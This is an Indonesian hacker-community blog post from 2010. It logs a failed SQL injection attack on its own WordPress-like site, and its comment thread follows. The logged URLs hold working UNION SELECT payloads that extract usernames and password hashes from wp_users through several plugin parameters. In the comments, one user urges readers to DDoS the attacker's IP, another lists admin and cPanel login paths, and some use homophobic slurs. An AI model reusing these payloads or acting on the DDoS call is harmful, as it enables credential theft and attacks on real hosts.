«
»

Intrusion Detected! (again)

Posted by NetSystem on January 11, 2010 – 3:59 AM      
Filed under Mainframe
Tagged as , , ,

Hello World,

I See The Intrusion @ serverISdown

I See The Intrusion @ serverISdown

Lagi dan lagi.. Percobaan untuk masuk ke serverISdown terdeteksi dan sudah di tangani dengan baik dari awal oleh saudara Xshadow sungguh perkiraan yang sangat baik dari beliau. Saya masih ingat bagaimana beliau menyarankan agar memakai double key dan pake dinding yang punya api. hehehe… cheers sob!

Kali ini serangan bukan hanya dari malingSIAL, rame dah.. serangan kali ini dengan SQLi, menggunakan xploit oleh S@BUN, ntah dia sendiri ato fans2 nya yang ga jelas melakukan exploitasi ini, soalnya ngga nge-cek sampe kesana.

Sampai sekarang kita masih aman-aman saja, belum tau kalo gimana nantinya.. hehehe.. kita akan selalu berusaha untuk tidak “down” ho ho ho… tapi emang udah “down” sejak dari awal berdirinya.

Ini sedikit jejak yang di tinggalkan oleh “attacker” dimana dia sangat semangat sekali untuk mencoba masuk ke serverISdown, mencoba banyak cara.

Check this out :

Web Page: www.news.serverisdown.org/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0×3a,user_pass)/**/from/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: dl_id = null/**/union/**/all/**/select/**/concat(user_login,0×3a,user_pass)/**/from/**/wp_users/*

Web Page: www.news.serverisdown.org/index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: photo = -333333/**/union/**/select/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from/**/wp_users/**WHERE admin 1= 1

Web Page: www.news.serverisdown.org/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: topic = -99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*

Web Page: www.news.serverisdown.org/sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: forum = -99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*

Web Page: www.news.serverisdown.org/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: newsletter = -1/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users

Web Page: www.news.serverisdown.org/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0×7c,user_login,0×7c,user_pass,0×7c),concat(0×7c,user_login,0×7c,user_pass,0×7c),4,5/**/FROM/**/wp_users
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: id = -998877/**/UNION/**/SELECT/**/0,1,concat(0×7c,user_login,0×7c,user_pass,0×7c),concat(0×7c,user_login,0×7c,user_pass,0×7c),4,5/**/FROM/**/wp_users

Web Page: news.serverisdown.org/?exact=1&sentence=1&s=%b3%27//AND//ID=-1//UNION/SELECT/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//wp_users%23
Warning: URL may contain dangerous content!

Offending IP: 41.232.102.179
Offending Parameter: s = ³’//AND//ID=-1//UNION/SELECT/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//wp_users#

Buat teman2 yang terkasih, jangan di coba buka link itu yah, nanti bisa barabe.. soalnya saya ngga bertanggung jawab apa yang akan terjadi.

Salam Hangat,

serverISdown

Comments RSS Feed   Post a comment   Trackback URL   Share on Twitter   Share on Facebook

Related Posts

22 Comments

  1. Net System says:
    January 11, 2010 at 4:04 AM

    Jangan biarkan PERTAMAX lewat begitu saja :)

    Dont try this at home, i`ll detect your home ^^v shut down your modem and soon soon soon soon…
    yang pengen latihan DDOS silahkan di coba IP di atas ^^v

    Reply to this comment
  2. nyubit says:
    January 11, 2010 at 6:00 AM

    Oms….oms master kneapa ini bisa terjadi yaaa..?

    membedah isi http://www.serverisdown.org , dah pada tau kali yah “server is down” itu punya sapa :

    pertama-tama buka ini dulu deh

    http://www.news.serverisdown.org/wp-admin/

    isinya ada bacaan : “Serius deh mas ini gak pake Wordpress, tp cuman mirip Wordpress… suer deh biar punya isteri lima kalo gw bohong”

    - /home/capt/sid/

    http://news.serverisdown.org/wp-content … itemap.xsl = keren jg akalnya

    tapi pas buka ini jadi penasaran :

    http://www.news.serverisdown.org/readme.html

    yaudah terusin deh :

    http://www.news.serverisdown.org/wp-admin/css/
    http://www.news.serverisdown.org/wp-admin/js/
    http://www.news.serverisdown.org/wp-admin/includes/
    http://www.news.serverisdown.org/wp-admin/import/
    http://www.news.serverisdown.org/wp-admin/images/

    masih di terusin kk ,, coba buka ini kk :

    http://yadoy666.serverisdown.org/files/

    ada bacaan :

    Gotcha…!!!

    Hey fuck, Get out from my blog…!!!

    masih penasaran yaudah terusin lagi kk :

    http://yadoy666.serverisdown.org/wp-admin/css/
    http://yadoy666.serverisdown.org/wp-admin/import/
    http://yadoy666.serverisdown.org/wp-admin/js/
    http://yadoy666.serverisdown.org/wp-admin/includes/

    login admin detected :

    - http://yadoy666.serverisdown.org/wp-admin/update.php
    - http://yadoy666.serverisdown.org/wp-adm … ?mod=login
    - http://yadoy666.serverisdown.org/wp-login.php
    - http://yadoy666.serverisdown.org:2082/
    - http://yadoy666.serverisdown.org/cpanel

    Reply to this comment
  3. kampret says:
    January 11, 2010 at 6:22 AM

    huhuhuhuhuhuhu

    Reply to this comment
  4. YaDoY666 says:
    January 11, 2010 at 3:11 PM

    Aw..aw..aw…

    Saya Gagal PERTAMAX…

    Uhm… Rapatkan barisan kawan-kawan…!!!

    Mari kita bersatu bahu membahu menghadapi sang penyusup tersebut.

    Keep Movin and Keep Rockin The Fvckin Intruder

    Reply to this comment
  5. irfan says:
    January 11, 2010 at 9:39 PM

    wow.. keren habis pertahanannya nih..
    kalau boleh tahu bagaimana caranya buat dinding yang ada apinya neh?

    Reply to this comment
  6. budi-spielberg says:
    January 12, 2010 at 2:54 AM

    wow mantab surantab…
    mao jg donk per wol nya…

    jack, ntu pan link nyang lu kasih maren malem d cf.
    ip aye nyangkut kagak tuh xixixi….

    Reply to this comment
  7. black_raptor says:
    January 12, 2010 at 2:06 PM

    hehehhe god.. god… jangan lupa root server gan…

    Reply to this comment
  8. H4ck3rKu says:
    January 12, 2010 at 2:38 PM

    Byk yg pengen cepat “terkenal”, dgn membobol situs Hacker ::))

    Reply to this comment
  9. kampret says:
    January 13, 2010 at 5:08 PM

    kontol

    Reply to this comment
    • YaDoY666 says:
      January 24, 2010 at 1:07 AM

      Haiah… Dia lagi…
      Bangga amad gan baru bisa directory listing aja…. ^_^
      Make bilang2 kontol-kontol segala, situ nggak punya kontol apa hoby ngocokin kontol?
      wah kasian amad itu kontol di boongin mulu..
      Appaaah? Kontol orang yang situ kocokin?
      wadooow… bahayak ini mah… Nambah lagi donk brati kaum GAY di indonesia…
      Prihatin saya jadi nya, mudah-mudahan cepet diberikan petunjuk supaya kembali ke jalan yang normal, inget gan cewe masih banyak, ngapain sih make main sama cowo segala… ish… Jijay deh jadinya…

      Reply to this comment
  10. xshadow says:
    January 16, 2010 at 10:23 PM

    mo deface aja susah… tinggal suspend aja hostingnya tar muncul deface-an gua… tapi biarin ajalah… tugas kita hanya memberikan ilmu yang dah kita punya… :D
    kalo mo belajar silahkan… tapi kami gak ikut2 dengan hasil akhir yang diperoleh….

    Reply to this comment
  11. tr1993r.m4ch1n3 says:
    January 18, 2010 at 11:12 AM

    ckckckck.. mantaph dah.. sarang hacker mo di jebol.. yang ada yang nyusup disodomi bareng2 sama hacker disini.. wkwkwkwkwk.. boleh laaa.. dibagi2 lognya om jack.. mari kita telusuri.. biar dobolnya si attacker itu nge-doll alias longgar.. wkwkwkwk.. keep movin guys..

    Reply to this comment
  12. boyman says:
    January 19, 2010 at 10:00 AM

    kwkwkw..
    telat x bilang..
    dah koit ane buka,,

    Reply to this comment
  13. madonk says:
    January 20, 2010 at 6:15 AM

    terlambatttttttttttttttttttt ohmaigat

    Reply to this comment
  14. doraemon says:
    January 21, 2010 at 10:35 PM

    mantaaapp kk…..
    semangaaat teruuusss kk….and buat om KillYou Alias..siapa yah..hhhheheheh…udah tau semua Ko Ga pernah Nongol Lagi….

    Salam Hangat dari newbie……

    Reply to this comment
  15. AaEzha says:
    January 22, 2010 at 7:29 AM

    adoooh..
    ada2 aja tuh penyusup :P

    pake exploit zaman penjajahan maja pahit itu mah :P

    Reply to this comment
  16. elv1n4 says:
    January 22, 2010 at 3:18 PM

    heueheuheu :P

    ada” aja ^_^

    Reply to this comment
  17. bocahmiring says:
    January 26, 2010 at 11:54 AM

    Serius deh mas ini gak pake Wordpress, tp cuman mirip Wordpress… suer deh biar punya isteri lima kalo gw bohong

    amiiiin :mrgreen:

    Reply to this comment
  18. AaEzha says:
    January 28, 2010 at 8:26 AM

    directori listing? :D
    wehehehehe..
    ya kudu ada yang 755 lah.. :P
    klo 111 buat apa??
    wekekeke

    Reply to this comment

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*